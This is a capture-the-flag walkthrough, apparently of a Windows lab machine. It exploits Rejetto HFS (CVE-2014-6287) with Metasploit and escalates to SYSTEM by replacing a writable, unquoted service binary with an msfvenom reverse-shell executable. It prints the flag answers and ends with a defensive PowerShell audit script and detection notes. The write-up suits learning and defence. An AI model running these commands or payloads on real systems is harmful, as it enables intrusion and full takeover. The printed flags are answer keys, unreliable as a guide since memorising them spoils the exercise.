[Task 1] Introduction
- Deploy the machine. Who is the employee of the month?
Let's scan the ports
nmap -Pn <IP>
Scan services and the OS
nmap -sV -O <IP>
There are 6 open ports and services. The OS is Windows Server 2008 R2 - 2012.
Let’s access port 80
http://<IP>
Inspect the page resources, source code, and network requests. Now we have the employee of the month.
ANS: Bill Harper
Let's scan for vulnerabilities
nmap --script vuln <IP>
Vulnerabilities reported:
port 80 -> http-vuln-cve2015-1635
port 8080 -> http-vuln-cve2011-3192
There are SMB ports too. Let's enumerate them with nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
Nothing useful in the scan result.
[Task 2] Initial Access
1. Scan the machine with nmap. What is the other port running a web server on?
ANS: 8080
2. Take a look at the other web server. What file server is running?
Access the website
http://<ip>:8080
Click on Server Information
It's Rejetto.
ANS: Rejetto HTTP File Server
3. What is the CVE number to exploit this file server?
Access exploit-db.com
https://www.exploit-db.com/
Search for rejetto and click the first result.
ANS: 2014-6287
4. Use Metasploit to get an initial shell. What is the user flag?
msfconsole
search 2014-6287
use 0
show options
set RHOSTS <target ip>
set RPORT 8080
run
getsystem
migrate
Migration failed, but the shell still works. Move to Bill's desktop and read the flag:
cd C:\Users\bill\Desktop
cat user.txt
ANS: b04763b6fcf51fcd7c13abc7db4fd365
[Task 3] Privilege Escalation
1. Upload the PowerUp script and run its checks
upload <path>
load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks
2. Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?
ANS: AdvancedSystemCareService9
3. The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!
Let's note the path first:
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
Use msfvenom to generate a reverse shell as a Windows executable.
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
Back in Metasploit, create the listener (run it as a background job so the existing session stays usable)
use multi/handler
set LHOST <attacker ip>
set LPORT <attacker port>
run -j
Back to my old session; in my case it's #3
sessions 3
Upload our payload
upload /root/Desktop/ASCService.exe
Stop the service
shell
sc stop AdvancedSystemCareService9
Copy the file over the legitimate binary
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
Start the service, which now runs our binary
sc start AdvancedSystemCareService9
Now, I only have 30 seconds to migrate to admin; if I waste time, the session will die and I have to redo the steps again.
For me, I've done these steps about 5 times before I could get a shell.
List processes
ps
Migrate to lsass.exe; in my case its PID is 648
migrate 648
getsystem
cd /Users/Administrator/Desktop
cat root.txt
ANS: 9af5f314f57607c00fd09803a587db80
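The two conditions step 3 relies on (an unquoted service binary path with spaces, and a service directory that low-privileged users can write to) are easy to audit before an attacker finds them. The following PowerShell script is an added example, not code from the original writeup or from PowerUp; it assumes it is run from an elevated prompt on the host being audited. It flags every service with either weakness and, in a comment, shows the remediation for the exact service and path named on this page. PowerUp's CanRestart flag is a separate check on the service's own DACL and is not evaluated here.

```powershell
# Added example, not part of the original writeup: audit a Windows host for
# the service misconfigurations the writeup abuses, i.e. an unquoted service
# binary path containing spaces and a binary directory that broad principals
# (Everyone, Users, Authenticated Users) can write to.
# Assumption: run from an elevated PowerShell prompt on the host being audited.

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # A quoted path ends at the closing quote; an unquoted one is taken up to
    # the first ".exe" so trailing arguments such as "-k netsvcs" are dropped.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName
}

function Test-WritableByBroadPrincipal {
    param([string]$Directory)
    # True when a broad principal holds an Allow ACE that permits creating or
    # writing files here: WriteData (0x2), GENERIC_WRITE (0x40000000) or
    # GENERIC_ALL (0x10000000). Generic rights appear on inherited ACEs as
    # large or negative numeric values, so the raw integer is tested.
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    $broad = @('Everyone', 'BUILTIN\Users',
               'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($broad -notcontains $ace.IdentityReference.Value) { continue }
        $raw = [int]$ace.FileSystemRights
        if ((($raw -band 0x2) -ne 0) -or (($raw -band 0x40000000) -ne 0) -or
            (($raw -band 0x10000000) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Find-WeakServicePaths {
    # Emits one object per service that has either weakness, so the result can
    # be piped to Format-Table or Export-Csv.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }
        $bin = Get-ServiceBinaryPath $svc.PathName
        $dir = Split-Path -Path $bin -Parent
        # Only an unquoted path that actually contains a space is exploitable
        $unquoted = ($svc.PathName -notmatch '^"') -and ($bin -match ' ')
        $writable = $false
        if ($dir -and (Test-Path -LiteralPath $dir)) {
            $writable = Test-WritableByBroadPrincipal -Directory $dir
        }
        if ($unquoted -or $writable) {
            [PSCustomObject]@{
                Service     = $svc.Name
                RunsAs      = $svc.StartName
                State       = $svc.State
                Path        = $svc.PathName
                Unquoted    = $unquoted
                DirWritable = $writable
            }
        }
    }
}

Find-WeakServicePaths | Format-Table -AutoSize

# Remediation for a finding like the one in the writeup (service name and
# path as given on the page): quote the binary path and strip the write
# permission from the directory.
#   sc.exe config AdvancedSystemCareService9 binPath= "\"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe\""
#   icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /remove:g Users /remove:g Everyone
```

A service running as LocalSystem from a directory that Users can write to is the finding to act on first, since it is exactly the combination that turns a foothold into SYSTEM. The 30-second window the writeup mentions is the Service Control Manager's default start timeout: a replaced binary that never reports itself as running is killed after 30 seconds, and the failure is logged in the System event log (event 7009, "A timeout was reached", or 7000, "service failed to start"), alongside the usual 7036 state-change events from the stop and start. Repeated stop/start cycles of a third-party service followed by a start timeout are therefore a cheap detection signal for this technique.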